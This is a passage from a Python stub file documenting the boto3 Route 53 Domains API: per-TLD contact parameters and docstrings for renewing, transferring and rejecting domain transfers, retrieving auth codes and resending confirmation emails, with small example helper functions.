CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
TechContact (dict) -- [REQUIRED]
Provides detailed contact information. For information about the values that you specify for each element, see ContactDetail .
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
PrivacyProtectAdminContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.
Default: true
PrivacyProtectRegistrantContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (the domain owner).
Default: true
PrivacyProtectTechContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.
Default: true
"""
pass
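# Illustrative sketch (not part of the generated stubs): the ExtraParams lists
# documented in the docstring above are plain name/value dictionaries. The helper
# below shows how such a list might be assembled for a hypothetical .ca contact
# that is a Canadian corporation; the specific values are taken from the
# documented valid values, but the scenario itself is an assumption.
def _example_build_ca_extra_params():
    # Each entry pairs one documented extra-parameter name with one of its
    # documented valid values.
    return [
        {'Name': 'CA_LEGAL_TYPE', 'Value': 'CCO'},             # Canadian corporation
        {'Name': 'CA_BUSINESS_ENTITY_TYPE', 'Value': 'CORP'},  # Corporation
    ]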
def reject_domain_transfer_from_another_aws_account(DomainName=None):
"""
Rejects the transfer of a domain from another AWS account to the current AWS account. You initiate a transfer between AWS accounts using TransferDomainToAnotherAwsAccount .
Use either ListOperations or GetOperationDetail to determine whether the operation succeeded. GetOperationDetail provides additional information, for example, Domain Transfer from Aws Account 111122223333 has been cancelled .
See also: AWS API Documentation
Exceptions
:example: response = client.reject_domain_transfer_from_another_aws_account(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that was specified when another AWS account submitted a TransferDomainToAnotherAwsAccount request.\n
:rtype: dict
Returns
Response Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --The RejectDomainTransferFromAnotherAwsAccount response includes the following element.
OperationId (string) --The identifier that TransferDomainToAnotherAwsAccount returned to track the progress of the request. Because the transfer request was rejected, the value is no longer valid, and you can\'t use GetOperationDetail to query the operation status.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
"""
pass
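# Illustrative sketch (assumption, not part of the generated stubs): calling this
# operation through a real boto3 client. 'example.com' is a hypothetical
# placeholder, and the call requires AWS credentials with Route 53 Domains
# permissions.
def _example_reject_domain_transfer():
    import boto3
    client = boto3.client('route53domains')
    response = client.reject_domain_transfer_from_another_aws_account(
        DomainName='example.com'
    )
    # Per the docstring above, once the transfer is rejected this OperationId can
    # no longer be queried with GetOperationDetail, so it is only returned here
    # for logging purposes.
    return response['OperationId']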
def renew_domain(DomainName=None, DurationInYears=None, CurrentExpiryYear=None):
"""
This operation renews a domain for the specified number of years. The cost of renewing your domain is billed to your AWS account.
We recommend that you renew your domain several weeks before the expiration date. Some TLD registries delete domains before the expiration date if you haven\'t renewed far enough in advance. For more information about renewing domain registration, see Renewing Registration for a Domain in the Amazon Route 53 Developer Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.renew_domain(
DomainName='string',
DurationInYears=123,
CurrentExpiryYear=123
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to renew.\n
:type DurationInYears: integer
:param DurationInYears: The number of years that you want to renew the domain for. The maximum number of years depends on the top-level domain. For the range of valid values for your domain, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nDefault: 1\n
:type CurrentExpiryYear: integer
:param CurrentExpiryYear: [REQUIRED]\nThe year when the registration for the domain is set to expire. This value must match the current expiration date for the domain.\n
:rtype: dict
Returns
Response Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
"""
pass
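# Illustrative sketch (assumption, not part of the generated stubs): renewing a
# domain for one additional year via a real boto3 client and then checking the
# operation status. 'example.com' and the expiry year are hypothetical values;
# CurrentExpiryYear must match the domain's actual expiration year.
def _example_renew_domain():
    import boto3
    client = boto3.client('route53domains')
    response = client.renew_domain(
        DomainName='example.com',
        DurationInYears=1,
        CurrentExpiryYear=2025,
    )
    # Per the docstring above, the returned OperationId can be passed to
    # GetOperationDetail to track progress of the renewal.
    return client.get_operation_detail(OperationId=response['OperationId'])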
def resend_contact_reachability_email(domainName=None):
"""
For operations that require confirmation that the email address for the registrant contact is valid, such as registering a new domain, this operation resends the confirmation email to the current email address for the registrant contact.
See also: AWS API Documentation
Exceptions
:example: response = client.resend_contact_reachability_email(
domainName='string'
)
:type domainName: string
:param domainName: The name of the domain for which you want Route 53 to resend a confirmation email to the registrant contact.
:rtype: dict
Returns
Response Syntax
{
'domainName': 'string',
'emailAddress': 'string',
'isAlreadyVerified': True|False
}
Response Structure
(dict) --
domainName (string) --The domain name for which you requested a confirmation email.
emailAddress (string) --The email address for the registrant contact at the time that we sent the verification email.
isAlreadyVerified (boolean) --
True if the email address for the registrant contact has already been verified, and false otherwise. If the email address has already been verified, we don\'t send another confirmation email.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'domainName': 'string',
'emailAddress': 'string',
'isAlreadyVerified': True|False
}
"""
pass
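# Illustrative sketch (assumption, not part of the generated stubs): resending
# the registrant confirmation email and reporting whether the address was
# already verified. Note the lowercase 'domainName' parameter used by this
# particular operation; 'example.com' is a hypothetical placeholder.
def _example_resend_confirmation_email():
    import boto3
    client = boto3.client('route53domains')
    response = client.resend_contact_reachability_email(domainName='example.com')
    if response['isAlreadyVerified']:
        # No new email is sent when the address has already been verified.
        print('Registrant email %s is already verified.' % response['emailAddress'])
    else:
        print('Confirmation email resent to %s.' % response['emailAddress'])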
def retrieve_domain_auth_code(DomainName=None):
"""
This operation returns the AuthCode for the domain. To transfer a domain to another registrar, you provide this value to the new registrar.
See also: AWS API Documentation
Exceptions
:example: response = client.retrieve_domain_auth_code(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to get an authorization code for.\n
:rtype: dict
Returns
Response Syntax
{
'AuthCode': 'string'
}
Response Structure
(dict) --The RetrieveDomainAuthCode response includes the following element.
AuthCode (string) --The authorization code for the domain.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'AuthCode': 'string'
}
"""
pass
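# Illustrative sketch (assumption, not part of the generated stubs): fetching the
# authorization (transfer) code for a domain so it can be provided to a new
# registrar. The AuthCode is sensitive, so this sketch returns it rather than
# printing it; 'example.com' is a hypothetical placeholder.
def _example_retrieve_auth_code():
    import boto3
    client = boto3.client('route53domains')
    response = client.retrieve_domain_auth_code(DomainName='example.com')
    return response['AuthCode']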
def transfer_domain(DomainName=None, IdnLangCode=None, DurationInYears=None, Nameservers=None, AuthCode=None, AutoRenew=None, AdminContact=None, RegistrantContact=None, TechContact=None, PrivacyProtectAdminContact=None, PrivacyProtectRegistrantContact=None, PrivacyProtectTechContact=None):
"""
Transfers a domain from another registrar to Amazon Route 53. When the transfer is complete, the domain is registered either with Amazon Registrar (for .com, .net, and .org domains) or with our registrar associate, Gandi (for all other TLDs).
For more information about transferring domains, see the following topics:
If the registrar for your domain is also the DNS service provider for the domain, we highly recommend that you transfer your DNS service to Route 53 or to another DNS service provider before you transfer your registration. Some registrars provide free DNS service when you purchase a domain registration. When you transfer the registration, the previous registrar will not renew your domain registration and could end your DNS service at any time.
If the transfer is successful, this method returns an operation ID that you can use to track the progress and completion of the action. If the transfer doesn\'t complete successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.transfer_domain(
DomainName='string',
IdnLangCode='string',
DurationInYears=123,
Nameservers=[
{
'Name': 'string',
'GlueIps': [
'string',
]
},
],
AuthCode='string',
AutoRenew=True|False,
AdminContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
RegistrantContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
TechContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
